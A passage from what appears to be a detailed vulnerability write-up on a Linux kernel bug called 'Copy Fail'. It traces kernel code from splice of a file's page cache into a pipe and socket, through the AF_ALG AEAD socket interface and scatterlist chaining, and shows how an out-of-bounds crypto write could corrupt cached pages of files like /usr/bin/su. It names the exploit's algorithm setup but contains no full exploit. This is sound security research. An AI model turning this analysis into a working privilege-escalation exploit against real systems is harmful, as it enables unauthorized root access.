fdput(out);
}
fdput(in);
}
return error;
}So the syscall boundary converts:
- userspace
fd_in→ sourcestruct file - userspace
fd_out→ destinationstruct file
Those objects enter __do_splice(), where the kernel checks whether either endpoint is a pipe:
static ssize_t __do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset, *__off_in = NULL, *__off_out = NULL;
ssize_t ret;
// Detect whether the input or output endpoint is a pipe-
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
...
// transition 2
return do_splice(in, __off_in, out, __off_out, len, flags);
}The direction is selected in do_splice():
ssize_t do_splice(struct file *in, loff_t *off_in,
struct file *out, loff_t *off_out,
size_t len, unsigned int flags)
{
...
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
// if both are pipes
if (ipipe && opipe) {
ret = splice_pipe_to_pipe(ipipe, opipe, len, flags);
// if only input is pipe
} else if (ipipe) {
ret = do_splice_from(ipipe, out, &offset, len, flags);
// if only output is pipe
} else if (opipe) {
/*
* transition 3
*
* Copy Fail first-stage direction:
*
* regular file -> pipe
*/
ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
} else {
ret = -EINVAL;
}
...
return ret;
}For the first Copy Fail stage:
in.file= regular file (e.g. /usr/bin/su)out.file= pipe
so the opipe branch dispatches into splice_file_to_pipe():
ssize_t splice_file_to_pipe(struct file *in,
struct pipe_inode_info *opipe,
loff_t *offset,
size_t len, unsigned int flags)
{
ssize_t ret;
pipe_lock(opipe);
ret = wait_for_space(opipe, flags);
if (!ret)
// transition 4
ret = do_splice_read(in, offset, opipe, len, flags);
pipe_unlock(opipe);
..
}At the transition point, do_splice_read() decides whether the operation can use the file's page cache or must fall back to a copied path:
static ssize_t do_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
...
/*
* O_DIRECT and DAX don't deal with the pagecache, so we allocate a
* buffer, copy into it and splice that into the pipe.
*/
if ((in->f_flags & O_DIRECT) || IS_DAX(in->f_mapping->host))
// O_DIRECT and DAX bypass normal page cache
// so kernel cannot perform normal page-cache-based splice operations
// but perform an explicit buffered copy instead
return copy_splice_read(in, ppos, pipe, len, flags);
/*
* transition 5
* normal buffered files use the file's splice_read handler
*/
return in->f_op->splice_read(in, ppos, pipe, len, flags);
}The important branch is at transition 5:
return in->f_op->splice_read(...); For normal buffered files, execution continues through the file's splice_read operation:
struct file_operations {
...
ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
...
} __randomize_layout;For page-cache-backed files, this last read step is the critical one, where now the current execution flow reaches
splice(fd_file, ..., fd_pipe, ...)
|
v
do_splice()
|
v
splice_file_to_pipe()
|
v
do_splice_read()
|
v
in->f_op->splice_read(...)The generic read-only file operations table wires filemap_splice_read() as the splice_read handler:
const struct file_operations generic_ro_fops = {
.read_iter = generic_file_read_iter,
.mmap = generic_file_readonly_mmap,
.splice_read = filemap_splice_read, // [!]
};The comment above filemap_splice_read() states the behavior directly:
/*
* filemap_splice_read - Splice data from a file's pagecache into a pipe
*
* This function gets folios from a file's pagecache and splices them into the
* pipe.
*/Internally, it first retrieves cached folios from the file mapping, then inserts those folios into pipe buffers:
ssize_t filemap_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe,
size_t len, unsigned int flags)
{
struct folio_batch fbatch;
...
do {
// retrieve page-cache folios from the file mapping
error = filemap_get_pages(&iocb, len, &fbatch, true);
...
for (i = 0; i < folio_batch_count(&fbatch); i++) {
struct folio *folio = fbatch.folios[i];
size_t n;
...
/*
* transition 6
* insert the selected cached folio into the pipe
*/
n = splice_folio_into_pipe(pipe, folio, *ppos, n);
...
}
folio_batch_release(&fbatch);
} while (len);
...
return total_spliced ? total_spliced : error;
}The exact insertion happens in splice_folio_into_pipe():
/*
* Splice subpages from a folio into a pipe.
*/
size_t splice_folio_into_pipe(struct pipe_inode_info *pipe,
struct folio *folio, loff_t fpos, size_t size)
{
struct page *page;
size_t spliced = 0, offset = offset_in_folio(folio, fpos);
...
while (spliced < size &&
!pipe_full(pipe->head, pipe->tail, pipe->max_usage)) {
// retrieve the next pipe_buffer slot inside the pipe ring buffer
struct pipe_buffer *buf = pipe_head_buf(pipe);
size_t part = min_t(size_t, PAGE_SIZE - offset, size - spliced);
// [!] insertion: attach file-backed page -> retrieved pipe buffer
*buf = (struct pipe_buffer) {
.ops = &page_cache_pipe_buf_ops, // [!] page cache marker
.page = page,
.offset = offset,
.len = part,
};
...
}
return spliced;
}The ops field is also important. The buffer is marked with page_cache_pipe_buf_ops, not the anonymous pipe-buffer operations used by ordinary write() introduced in earlier section 3.2.2:
// install operations for page-cache buffer
const struct pipe_buf_operations page_cache_pipe_buf_ops = {
.confirm = page_cache_pipe_buf_confirm,
.release = page_cache_pipe_buf_release,
.try_steal = page_cache_pipe_buf_try_steal,
.get = generic_pipe_buf_get,
};At this stage, the pipe buffer directly references a file-backed page-cache page:
file on disk (e.g. /usr/bin/su)
│
▼
page cache folio/page
│
│ filemap_splice_read()
▼
pipe_buffer {
.ops = page_cache_pipe_buf_ops
.page = file-backed page-cache page [!]
}This is the first bridge Copy Fail needs. After splice(file -> pipe), the pipe is not carrying copied file bytes in anonymous pipe memory. It is carrying a pipe_buffer that still references the original cached file page.
3.2.4.2 Pipe -> Socket
The second stage is that the pipe layer can forward the same pipe_buffer into another kernel subsystem. For Copy Fail, the relevant destination is a socket send path.
The generic helper __splice_from_pipe() describes the model directly: it walks pipe buffers and lets an actor move each buffer to the destination.
/**
* __splice_from_pipe - splice data from a pipe to given actor
*
* Description:
* This function does little more than loop over the pipe and call
* @actor to do the actual moving of a single struct pipe_buffer to
* the desired destination. See pipe_to_file, pipe_to_sendmsg, or
* pipe_to_user.
*/For socket destinations, one concrete actor path is splice_to_socket():
/**
* splice_to_socket - splice data from a pipe to a socket
*
* Description:
* Will send @len bytes from the pipe to a network socket. No data copying
* is involved.
*/The comment gives the high-level idea, but the important detail is visible in the implementation: the socket payload is built from the page already carried by the pipe buffer.
struct bio_vec bvec[16];
struct msghdr msg = {};
...
struct pipe_buffer *buf = pipe_buf(pipe, tail);
...
bvec_set_page(
&bvec[bc++],
buf->page, // page referenced by pipe_buffer
seg, // byte length
buf->offset // offset inside that page
);Here, struct bio_vec is a small descriptor for a page-backed byte range:
struct bio_vec {
struct page *bv_page;
unsigned int bv_len;
unsigned int bv_offset;
};So this conversion is straightforward:
pipe_buffer
page = cached file page
offset = offset inside that page
len = visible byte range
│
▼
bio_vec
bv_page = same cached file page
bv_offset = same offset
bv_len = selected segment lengthThen splice_to_socket() wraps those bio_vec entries into the socket message iterator:
// make msg_iter walk over bio_vec-backed pages
iov_iter_bvec(
&msg.msg_iter, // describes the payload being sent
ITER_SOURCE,
bvec,
bc,
len
);
msg.msg_flags = MSG_SPLICE_PAGES; // [!] mark this send as splice-backed page data
ret = sock_sendmsg(sock, &msg);The flag MSG_SPLICE_PAGES tells the socket send path this payload came from spliced pages rather than from an ordinary copied userspace buffer.
That gives the handoff shape:
pipe_buffer
|
| buf->page / buf->offset / buf->len
v
bio_vec
|
| iov_iter_bvec()
v
msghdr.msg_iter
|
| MSG_SPLICE_PAGES
v
sock_sendmsg()The key point is that the socket consumer is not receiving a freshly copied anonymous buffer. It receives a socket message whose iterator still describes page-backed data derived from the original pipe buffer.
For Copy Fail, the chain now looks like this:
file-backed cached page
|
v
pipe_buffer
|
v
bio_vec
|
v
msg.msg_iter + MSG_SPLICE_PAGES
|
v
socket-side consumerAt this point, the generic primitive is established: a file-backed cached page can move from a pipe into a socket send path while still being represented as page-backed data.
3.3 AF_ALG Crypto Request Pipeline
The previous section stopped at a pipe buffer being forwarded into a socket send path. For Copy Fail, the socket consumer that matters is AF_ALG: the Linux kernel crypto socket interface.
This is where the data changes identity:
file-backed page
|
v
pipe buffer
|
v
socket message
|
v
AF_ALG crypto request bufferOnce the page-backed data enters AF_ALG, it can be represented as part of a crypto request scatterlist rather than as ordinary executable file data.
If you are not farmiliar with kernel socket implementation, I would suggest the learning resource:
LinuxNetworkProgramming: A comprehensive guide for Linux Network (Socket) programming
3.3.1 AF_ALG Socket Interface
AF_ALG, socket family 38, exposes part of the kernel crypto API through the socket interface.
From userspace, it does not look like a privileged ioctl or a special device node. It follows a normal socket-style workflow:
socket()
|
v
bind algorithm type/name
|
v
setsockopt configuration
|
v
accept operation socket
|
v
sendmsg input
|
v
recvmsg output3.3.1.1 Userspace Call Pattern
A minimal AF_ALG hash example looks like this:
#include <stdio.h>
#include <sys/socket.h>
#include <linux/if_alg.h>
#include <unistd.h>
#include <string.h>
int main(void)
{
/* create AF_ALG control socket */
int tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
// [!] selected algorithm
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "hash",
.salg_name = "sha256",
};
/* bind algorithm type/name */
bind(
tfmfd, // AF_ALG socket fd
(struct sockaddr *)&sa, // sockaddr_alg
sizeof(sa)
);
/* create operation socket */
int opfd = accept(tfmfd, NULL, 0);
/* submit input buffer */
send(opfd, "AAAA", 4, 0);
/* receive resulting digest */
unsigned char digest[32];
recv(opfd, digest, sizeof(digest), 0);
/* print digest */
printf("sha256(\"AAAA\") = ");
for (int i = 0; i < 32; i++)
printf("%02x", digest[i]);
printf("\n");
close(opfd);
close(tfmfd);
return 0;
}The sample computes the SHA256 digest of the input string "AAAA":
axura@pwnlab:/tmp$ gcc -o test_alg test_alg.c axura@pwnlab:/tmp$ ./test_alg sha256("AAAA") = 63c1dd951ffedf6f7fd968ad4efa39b8ed584f162f46e715114ee184f8de9201
3.3.1.2 Algorithm Selection
The algorithm selection itself is carried through the AF_ALG-specific socket address structure, struct sockaddr_alg:
struct sockaddr_alg {
__u16 salg_family;
__u8 salg_type[14];
__u32 salg_feat;
__u32 salg_mask;
__u8 salg_name[];
};This is the AF_ALG-specific socket address format. It plays the same structural role as:
sockaddr_infor IPv4sockaddr_in6for IPv6sockaddr_unfor Unix sockets
But instead of carrying an IP address or filesystem path, it carries crypto selection data:
The two important user-controlled strings are:
salg_type: which AF_ALG interface family should handle this socketsalg_name: which concrete crypto algorithm inside that family should be instantiated
In the Copy Fail path, userspace supplies this pair:
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",The first string decides which AF_ALG family handles the socket. The second decides which kernel crypto algorithm is instantiated inside that family.
userspace
│
│ socket(AF_ALG, SOCK_SEQPACKET, 0)
│
│ bind(
│ type = "aead",
│ name = "authencesn(hmac(sha256),cbc(aes))"
│ )
▼
kernel AF_ALG layer
│
│ resolve family + algorithm
▼
AEAD operation socket
│
│ sendmsg() / recvmsg()
▼
selected AEAD implementationThe authencesn decrypt path becomes important later in 3.4. For now, the key point is that an ordinary userspace bind() routes the socket into the AEAD family and selects the exact transform used by the exploit.
3.3.1.3 AF_ALG Family Resolution
At that point, userspace has already prepared an AF_ALG control socket, and calls bind() with an initialized struct sockaddr_alg:
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
};
bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa));The generic socket layer eventually reaches __sys_bind(), which dispatches through the socket operations table:
err = READ_ONCE(sock->ops)->bind(
sock,
(struct sockaddr *)&address,
addrlen
);For an AF_ALG transform socket, that handler is alg_bind(). This is where the generic AF_ALG layer receives the algorithm type and name from the created sockaddr_alg object in last step:
type = alg_get_type(sa->salg_type); // resolve AF_ALG interface family
...
private = type->bind(
sa->salg_name,
sa->salg_feat,
sa->salg_mask
);For Copy Fail:
sa->salg_type = "aead"so the kernel resolves the registered AF_ALG family named "aead".
The resolved object is a struct af_alg_type, the family dispatch table:
struct af_alg_type {
/* instantiate concrete algorithm by name */
void *(*bind)(const char *name, u32 type, u32 mask);
/* release family-private algorithm state */
void (*release)(void *private);
/* configure key material */
int (*setkey)(void *private, const u8 *key, unsigned int keylen);
/* configure AEAD authentication tag size */
int (*setauthsize)(void *private, unsigned int authsize);
/* create accepted operation socket */
int (*accept)(void *private, struct sock *sk);
int (*accept_nokey)(void *private, struct sock *sk);
/* socket operations exposed by accepted operation socket */
struct proto_ops *ops;
struct proto_ops *ops_nokey;
struct module *owner;
/* AF_ALG family name, e.g. "aead" */
char name[14];
};For the AEAD family used in Copy Fail, this resolves to algif_type_aead:
static const struct af_alg_type algif_type_aead = {
.bind = aead_bind,
.release = aead_release,
.setkey = aead_setkey,
.setauthsize = aead_setauthsize,
.accept = aead_accept_parent,
.accept_nokey = aead_accept_parent_nokey,
.ops = &algif_aead_ops,
.ops_nokey = &algif_aead_ops_nokey,
.name = "aead",
.owner = THIS_MODULE
};Now the earlier generic bind call becomes concrete:
type->bind(...)
|
v
aead_bind("authencesn(hmac(sha256), cbc(aes))", ...)So the resolution chain is:
bind(tfmfd, sockaddr_alg)
|
v
alg_bind()
|
| salg_type = "aead"
v
alg_get_type("aead")
|
v
algif_type_aead
|
| salg_name = "authencesn(hmac(sha256),cbc(aes))"
v
aead_bind(...)The same family object also controls later operations trhough the algif_type_aead object:
setsockopt(..., ALG_SET_KEY, ...)
|
v
aead_setkey()
setsockopt(..., ALG_SET_AEAD_AUTHSIZE, ...)
|
v
aead_setauthsize()
accept(tfmfd, ...)
|
v
aead_accept_parent()
sendmsg(opfd, ...) / recvmsg(opfd, ...)
|
v
algif_aead_opsThat last field matters because the accepted operation socket exposes the AEAD-specific socket operations table struct algif_aead_ops:
static struct proto_ops algif_aead_ops = {
...
.sendmsg = aead_sendmsg,
.recvmsg = aead_recvmsg,
...
};So the full bridge is:
userspace bind()
|
v
generic AF_ALG bind handler
|
v
resolve family by salg_type
|
v
instantiate algorithm by salg_name
|
v
install family-specific behavior for later
setsockopt(), accept(), sendmsg(), recvmsg()For Copy Fail, this means a normal userspace socket setup is enough to route later sendmsg() and recvmsg() calls into the AEAD request path selected by authencesn(hmac(sha256),cbc(aes)).
3.3.1.4 Control Socket and Operation Socket Split
AF_ALG separates transform configuration from request I/O.
The socket returned by socket(AF_ALG, ...) is the control socket:
// request AF_ALG socket returning control socket tfmfd
tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0)
bind(tfmfd, ...)
setsockopt(tfmfd, ...)Then the bind(tfmfd,...) and setsockopt(tfmfd,...) calls select and configure the corresponding crypto transform.
Actual request traffic happens on a second socket created by accept():
int opfd = accept(tfmfd, NULL, 0); // accept() returns operation socketInside the kernel, af_alg_accept() this operation socket and installs the operation table from the resolved struct af_alg_type mentioned in previous section:
const struct af_alg_type *type;
/*
* newsock->ops assigned here to allow type->accept call to override
* them when required.
*/
newsock->ops = type->ops;For the AEAD family, type->ops points to algif_aead_ops:
static struct proto_ops algif_aead_ops = {
...
.sendmsg = aead_sendmsg,
.recvmsg = aead_recvmsg,
...
};So after accept() returns, the fd used by userspace is already wired to AEAD-specific I/O:
control socket
════════════════════════════════════════
tfmfd
├─ bind() -> select algorithm
└─ setsockopt() -> configure transform
operation socket
════════════════════════════════════════
accept(tfmfd)
│
▼
opfd
├─ sendmsg() -> aead_sendmsg()
└─ recvmsg() -> aead_recvmsg()For Copy Fail, the vulnerable data path is reached through the operation socket.
3.3.1.5 AEAD Request Submission
The minimal hash example in 3.3.1.1 can use plain send() and recv() because a hash request is simple:
input bytes -> digest bytesAEAD requests carry more structure. A single request needs:
- operation direction: encrypt or decrypt
- IV: nonce / initialization vector
- AAD length: associated-data boundary
- payload bytes: plaintext or ciphertext
- tag: the authentication tag
That is why the AEAD path uses sendmsg(): the payload travels through msg->msg_iter, while request metadata travels through control messages attached to the same msghdr.
The AEAD operation table routes sendmsg(opfd, ...) into aead_sendmsg():
static int aead_sendmsg(
struct socket *sock,
struct msghdr *msg,
size_t size)
{
return af_alg_sendmsg(sock, msg, size, ivsize);
}aead_sendmsg() is only the AEAD wrapper. The shared request builder is af_alg_sendmsg().
First, it parses control messages from the user-supplied msghdr:
int af_alg_sendmsg(struct socket *sock, struct msghdr *msg, size_t size,
unsigned int ivsize)
{
...
while ((cmsg = af_alg_cmsg_send(msg, &con)) != NULL) {
switch (cmsg->cmsg_type) {
/* encrypt/decrypt selector */
case ALG_SET_OP:
ctx->op = *(u32 *)CMSG_DATA(cmsg);
break;
/* AEAD associated-data (AAD) length */
case ALG_SET_AEAD_ASSOCLEN:
/*
* Number of bytes at the start of the input
* that should be treated as AAD.
*/
ctx->aead_assoclen = af_alg_control_aead(cmsg);
break;
...This brings in an important term frequently used in the following context, AAD (AEAD associated-data). So when we see variables named like aead_assoclen in the kernel source, we should understand it refers to the length of AAD.
Then it converts the payload from msg->msg_iter into scatter-gather state:
iov_iter_extract_will_pin(&msg->msg_iter);
len = af_alg_make_sg(&ctx->sgl, &msg->msg_iter, 0, len);The request assembly looks like this:So the request assembly is:
sendmsg(opfd, msghdr)
│
▼
aead_sendmsg()
│
▼
af_alg_sendmsg()
│
├─ control messages
│ ├─ operation direction
│ ├─ IV
│ └─ AAD length
│
└─ msg_iter payload
│
▼
scatter-gather buffersSo by the end of sendmsg(), the request is no longer just userspace socket input. It has been converted into kernel-side crypto state:
- metadata → stored in ctx
- payload → represented by scatter-gather buffers
That is the bridge Copy Fail needs. The later bug depends on what backs those scatter-gather buffers (will be introduced in 3.3.3): ordinary userspace memory, or page-backed data imported through the zero-copy splice path (see 3.2.3).
3.3.2 AEAD Buffer Contract
Before we reach the final scatter-gather (scatterlist) representation, we need to understand the logical AEAD buffer contract. The kernel does not immediately treat the queued bytes as an arbitrary scatterlist; it first interprets them as an AEAD request with a strict layout:
AAD || payload || optional tag— this is a logical layout, not an adjacent structure on a contiguous memory. It decides the buffer boundary that we care about in memory corruption.
Therefore, after sendmsg() queues request bytes and records ctx->aead_assoclen, recvmsg() has to interpret those bytes according to that AEAD contract:
- AAD is authenticated but not encrypted
- payload is plaintext for encryption, ciphertext for decryption
- tag is produced during encryption and consumed during decryption
So the layout depends on the request direction:
encrypt:
input = AAD || plaintext
output = AAD || ciphertext || tag
decrypt:
input = AAD || ciphertext || tag
output = AAD || plaintextThat split appears directly in _aead_recvmsg():
static int _aead_recvmsg(
struct socket *sock,
struct msghdr *msg,
size_t ignored,
int flags)
{
...
/* AEAD authentication tag size */
unsigned int as = crypto_aead_authsize(tfm);
...
/*
* Total bytes queued earlier through sendmsg().
*
* Encrypt input:
* AAD || plaintext
*
* Decrypt input:
* AAD || ciphertext || tag
*/
used = ctx->used;
/*
* outlen is the size of the recvmsg-side output buffer needed.
*
* Encrypt:
* output = AAD || ciphertext || tag
* outlen = input + tag
*
* Decrypt:
* output = AAD || plaintext
* outlen = input - tag
*/
if (ctx->enc)
outlen = used + as; // 1 encryption
else
outlen = used - as; // 2 decryption
/*
* Rebase "used" from total input length to crypto payload length.
*
* AAD is not encrypted/decrypted, so it is removed here and stored
* separately as req->assoclen through aead_request_set_ad().
*
* After this:
*
* Encrypt:
* used = plaintext length
*
* Decrypt:
* used = ciphertext || tag length
*/
used -= ctx->aead_assoclen;
...
}The comments give the two pieces of bookkeeping we care about:
outlen→ recvmsg-side output sizeused→ AEAD crypto payload length after removing AAD
For Copy Fail, the decrypt case is the critical one:
AEAD decrypt contract
════════════════════════════════════════════════════════════
input queued through sendmsg():
┌────────────┬────────────────────┬────────────┐
│ AAD │ ciphertext │ tag │
└────────────┴────────────────────┴────────────┘
0 assoclen assoclen+ctlen +authsize
decrypts to verifies only
│ │
▼ ×
output prepared for recvmsg():
┌────────────┬────────────────────┐
│ AAD │ plaintext │
└────────────┴────────────────────┘
0 assoclen assoclen+ptlen
▲
│
valid output boundaryThe tag is part of the decrypt input because the AEAD algorithm needs it for authentication. But it is not part of the decrypt output.
That boundary matters later in 3.3.4.3: the valid decrypt output ends after AAD || plaintext, while the original decrypt input still had a tag after AAD || ciphertext. Copy Fail becomes possible when the request construction preserves that tag tail after the output region and a later algorithm-side write crosses into it.
3.3.3 Scatterlist Through Scatterwalk
At the AEAD level, the logical buffer boundary is now clear. The next question is why a helper can read or write past one backing region and continue into another.
The answer is the crypto layer does not require one flat contiguous buffer. The walker (scatterwalk) commonly operates on a scatterlist chain: a list of page-backed byte ranges treated as one continuous logical stream.
3.3.3.1 Logical View
The crypto layer may see one logical buffer:
logical crypto buffer
════════════════════════════════════════════════════════════
0 end
│ [logical byte stream] │
▼ ▼
┌───────────────┬──────────────────┬──────────────────────┐
│ AAD │ ciphertext │ tag │
└───────────────┴──────────────────┴──────────────────────┘But underneath, that stream can be backed by several independent scatterlist entries:
scatterlist backing
════════════════════════════════════════════════════════════
┌───────────────┐ ┌───────────────┐ ┌──────────────────────┐
│ sg entry #0 │ │ sg entry #1 │ │ sg entry #2 │
│ user page │ │ user page │ │ file-backed page │
└───────┬───────┘ └──────┬────────┘ └────────┬─────────────┘
│ │ │
▼ ▼ ▼
┌───────────────┬──────────────────┬──────────────────────┐
│ AAD │ ciphertext │ tag │
└───────────────┴──────────────────┴──────────────────────┘An "sg entry" means one struct scatterlist entry. The critical idea is that the crypto layer can treat these separate backing regions as one logical byte stream.
3.3.3.2 Scatterlist Entry Layout
The core object is struct scatterlist:
struct scatterlist {
unsigned long page_link; // encoded page pointer + flags
unsigned int offset; // byte offset inside the page
unsigned int length; // number of bytes available
dma_addr_t dma_address;
...
};Conceptually, one scatterlist entry means:
this logical range lives at:
page+offsetforlengthbytes
So a scatterlist entry is not a malloc-style buffer. It is a descriptor for a byte range inside a page.
The page attachment is made explicit by sg_set_page():
/**
* sg_set_page - Set sg entry to point at given page
* @sg: SG entry
* @page: The page
* @len: Length of data
* @offset: Offset into page
*
* Description:
* Use this function to set an sg entry pointing at a page, never assign
* the page directly. We encode sg table information in the lower bits
* of the page pointer. See sg_page() for looking up the page belonging
* to an sg entry.
*
**/
static inline void sg_set_page(struct scatterlist *sg, struct page *page,
unsigned int len, unsigned int offset)
{
sg_assign_page(sg, page); // attach backing page
sg->offset = offset; // start offset inside page
sg->length = len; // valid byte length
}3.3.3.3 Scatterlist Chaining
Multiple entries can be connected through sg_chain() reaching __sg_chain():
#define SG_CHAIN 0x01UL
#define SG_END 0x02UL
static inline void sg_chain(
struct scatterlist *prv,
unsigned int prv_nents,
struct scatterlist *sgl)
{
__sg_chain(&prv[prv_nents - 1], sgl);
}
static inline void __sg_chain(struct scatterlist *chain_sg,
struct scatterlist *sgl)
{
/*
* offset and length are unused for chain entry. Clear them.
*/
chain_sg->offset = 0;
chain_sg->length = 0;
/*
* Set lowest bit to indicate a link pointer, and make sure to clear
* the termination bit if it happens to be set.
*/
chain_sg->page_link = ((unsigned long) sgl | SG_CHAIN) & ~SG_END;
}The resulting shape is:
scatterlist chain
═══════════════════════════════════
┌────────────────────────────┐
│ sg #0 │
│ page = user page A │
│ offset = 0x120 │
│ length = 0x300 │
└──────────────┬─────────────┘
│ sg_next()
▼
┌────────────────────────────┐
│ sg #1 │
│ page = user page B │
│ offset = 0x000 │
│ length = 0x700 │
└──────────────┬─────────────┘
│ sg_next()
▼
┌────────────────────────────┐
│ sg #2 │
│ page = file-backed page │
│ offset = 0x200 │
│ length = 0x010 │
└────────────────────────────┘A consumer of this chain can walk from sg #0 into sg #1, then into sg #2, as if all entries formed one continuous buffer, while they are actaully "scattered".
3.3.3.4 Scatterwalk Mechanics
That is where scatterwalk enters the picture.
scatterwalk_map_and_copy() copies bytes into or out of a scatterlist chain starting at a logical offset:
void scatterwalk_map_and_copy(void *buf, struct scatterlist *sg,
unsigned int start, unsigned int nbytes, int out)
{
struct scatter_walk walk;
struct scatterlist tmp[2];
// jump to the sg entry containing logical offset "start" */
sg = scatterwalk_ffwd(tmp, sg, start);
// start walking from that entry
scatterwalk_start(&walk, sg);
// copy nbytes across one or more sg entries
scatterwalk_copychunks(buf, &walk, nbytes, out);
scatterwalk_done(&walk, out, 0);
}The helper does not operate against one flat allocation. It fast-forwards to a logical offset, then copies across the scatterlist stream.
When the current entry is exhausted, the walker can continue into the next entry. The transition happens through scatterwalk_done() → scatterwalk_pagedone():
static inline void scatterwalk_done(struct scatter_walk *walk, int out,
int more)
{
/*
* Finish the current page/chunk when:
*
* - there is no more data to copy, or
* - the current scatterlist entry is exhausted, or
* - the walk reached a page boundary
*/
if (!more ||
walk->offset >= walk->sg->offset + walk->sg->length ||
!(walk->offset & (PAGE_SIZE - 1)))
scatterwalk_pagedone(walk, out, more);
}
static inline void scatterwalk_pagedone(struct scatter_walk *walk, int out,
unsigned int more)
{
/*
* If data was written into the backing page,
* flush the data cache for coherency.
*/
if (out) {
struct page *page;
page = sg_page(walk->sg) +
((walk->offset - 1) >> PAGE_SHIFT);
flush_dcache_page(page);
}
/*
* If more bytes remain and the current scatterlist entry
* has been fully consumed, move to the next entry:
*
* current sg entry -> sg_next(current sg entry)
*/
if (more &&
walk->offset >= walk->sg->offset + walk->sg->length)
scatterwalk_start(walk, sg_next(walk->sg)); // [!]
}The important line is:
scatterwalk_start(walk, sg_next(walk->sg));Meaning:
current sg entry
│
│ sg_next()
▼
next sg entry
│
│ scatterwalk_start()
▼
copy continues thereSo if one entry ends and another entry is chained after it, scatterwalk can keep moving.
sg #0 sg #1
┌────────────────────────────┐ ┌────────────────────────────┐
│ AAD || plaintext │ │ tag / scratch / next bytes │
└────────────────────────────┘ └────────────────────────────┘
│
└── sg_next(sg #0) 3.3.3.5 Output-boundary Crossing
This is the property Copy Fail needs.
From the helper's point of view, the target is only:
sg =
logical offset+lengthinside a scatterlist chain
It does not inherently know that one entry is legitimate decrypt output while the next entry may be a borrowed pipe/page-cache-backed page.
The dangerous shape is:
destination scatterlist
══════════════════════════════════════════════════════════════
valid output area sg_next() chained entry
┌────────────────────────────┐ ┌────────────────────────────┐
│ sg #0 │ │ sg #1 │
│ legitimate AEAD output │───▶│ page-cache-backed file page│
│ AAD || plaintext │ │ must not receive writes │
└────────────────────────────┘ └────────────────────────────┘
▲
│
valid output ends hereFor AEAD decryption, the valid output boundary is:
AAD length (assoclen) + plaintext lengthThe authentication tag belongs to the input:
AAD || ciphertext || tagbut not to the output:
AAD || plaintextSo if crypto code writes past the valid decrypt output boundary, scatterwalk can mechanically follow sg_next() into the next scatterlist entry. It does not know that sg #0 is legitimate output while sg #1 may be a page-cache-backed file page.
That is why scatterlists matter here: they turn separate backing regions into one logical byte stream, and the walker follows that stream mechanically.
So if we want to exploit that logical buffer with an overwrite, the question becomes:
Look into those scatterlist write primitives, and will there be "overflow" bugs triggered by the kernel?
If yes, and if the next chained entry is page-cache-backed, that write can stop being ordinary buffer handling and become an overflow-style page-cache corruption primitive.
3.3.4 AEAD Request Scatterlist Construction
3.3.4.1 Socket SGLs and Crypto Request SGLs
The previous section established that scatterwalk can traverse a scatterlist chain. The missing link is the builder:
Which code constructs the scatterlist chain consumed by the AEAD implementation?
That bridge is _aead_recvmsg(), reached through the AEAD operation socket created by accept().
The kernel source file algif_aead.c describes the model in terms of two socket-side scatterlists, TX and RX:
/*
* ...
*
* The following concept of the memory management is used:
*
* The kernel maintains two SGLs, the TX SGL and the RX SGL. The TX SGL is
* filled by user space with the data submitted via sendmsg (maybe with
* MSG_SPLICE_PAGES). Filling up the TX SGL does not cause a crypto operation
* -- the data will only be tracked by the kernel. Upon receipt of one recvmsg
* call, the caller must provide a buffer which is tracked with the RX SGL.
*
* During the processing of the recvmsg operation, the cipher request is
* allocated and prepared. As part of the recvmsg operation, the processed
* TX buffers are extracted from the TX SGL into a separate SGL.
*
* ...
*/The socket-side meaning is:
- TX SGL:
- transmit-side scatterlist
- data queued through
sendmsg() - may include
MSG_SPLICE_PAGES-backed entrie (see 3.2.4.2)
- RX SGL:
- receive-side scatterlist
- destination buffer supplied by
recvmsg()for the operation result
During recvmsg(), _aead_recvmsg() translates those socket buffers into a crypto-layer request object struct aead_request:
struct aead_request {
struct crypto_async_request base;
unsigned int assoclen; /* AAD length */
unsigned int cryptlen; /* payload length */
u8 *iv; /* IV / nonce */
struct scatterlist *src; /* input scatterlist */
struct scatterlist *dst; /* output scatterlist */
void *__ctx[] CRYPTO_MINALIGN_ATTR;
};The naming transition is:
AF_ALG socket layer crypto request layer
─────────────────── ────────────────────
TX SGL ─────────────────────────▶ req->src
data submitted by sendmsg() input scatterlist
RX SGL ─────────────────────────▶ req->dst
buffer supplied to recvmsg() output scatterlistSo _aead_recvmsg() is the conversion point:
sendmsg() data ─► socket TX SGL ─► req->src
recvmsg() buffer ─► socket RX SGL ─► req->dstThe decrypt path is the dangerous one (will be introduced in 3.3.4.3). The authentication tag must remain available as input through req->src, but it is not part of the valid decrypt output in req->dst. That mismatch makes the later scatterlist chaining security-sensitive.
3.3.4.2 Encryption Request Layout
For encryption, the AEAD contract is:
input = AAD || plaintext
output = AAD || ciphertext || tagInside _aead_recvmsg(), the encryption branch first copies the queued TX input into the RX destination scatterlist:
if (ctx->enc) {
/*
* Encryption operation - The in-place cipher operation is
* achieved by the following operation:
*
* TX SGL: AAD || PT
* | |
* | copy |
* v v
* RX SGL: AAD || PT || Tag
*/
/*
* Step 1:
* Copy AAD || plaintext from TX into RX.
*
* At this point, RX contains the input material and has
* enough space for the tag that will be produced later.
*/
err = crypto_aead_copy_sgl(
null_tfm,
tsgl_src, // source: queued TX input
areq->first_rsgl.sgl.sgt.sgl, // destination: RX output
processed // bytes copied into RX
);
...
/*
* Step 2:
* Consume the TX entries that were copied.
*/
af_alg_pull_tsgl(sk, processed, NULL, 0);
